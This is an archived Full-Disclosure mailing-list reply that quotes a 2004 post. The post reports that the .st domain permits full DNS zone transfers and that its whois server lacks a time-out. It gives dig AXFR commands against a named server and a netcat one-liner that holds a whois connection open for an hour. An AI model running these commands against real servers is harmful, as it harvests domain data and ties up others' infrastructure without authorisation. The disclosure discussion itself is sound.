[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Re: zone transfers, a spammer's dream?

To: Troubles Troubles <troubles___@xxxxxxxxxxx>
Subject: Re: [Full-Disclosure] Re: zone transfers, a spammer's dream?
From: Byron Copeland <nodialtone@xxxxxxxxxxx>
Date: 19 Dec 2004 23:39:55 -0500

That is *sweet*  nice find.

On Sun, 2004-12-19 at 19:40, Troubles Troubles wrote:
> == the fucking bugtraq moderators don't let me post this! ==
> 
> .st has this bug too. you can transfer the whole domain. their whois server 
> also doesn't have any time-out!
> 
> try this:
> 
> dig @a.root-servers.net. st. ns
> dig @auth61.ns.uu.net. st. axfr
> (sleep 3600; perl -e 'print "karlung-liberation-front.st\015\012";') | nc 
> whois.nic.st. 43
> 
> found by
> troubles
> 
> _________________________________________________________________
> LÃttare att hitta drÃmresan med MSN Resor http://www.msn.se/resor/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-- 
Byron Copeland
www.virtualondemand.com

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] Re: zone transfers, a spammer's dream?
  - From: Troubles Troubles

Prev by Date: [Full-Disclosure] Re: zone transfers, a spammer's dream?
Next by Date: [Full-Disclosure] Re: zone transfers, a spammer's dream?
Previous by thread: [Full-Disclosure] Re: zone transfers, a spammer's dream?
Next by thread: [Full-Disclosure] Re: zone transfers, a spammer's dream?
Index(es):
- Date
- Thread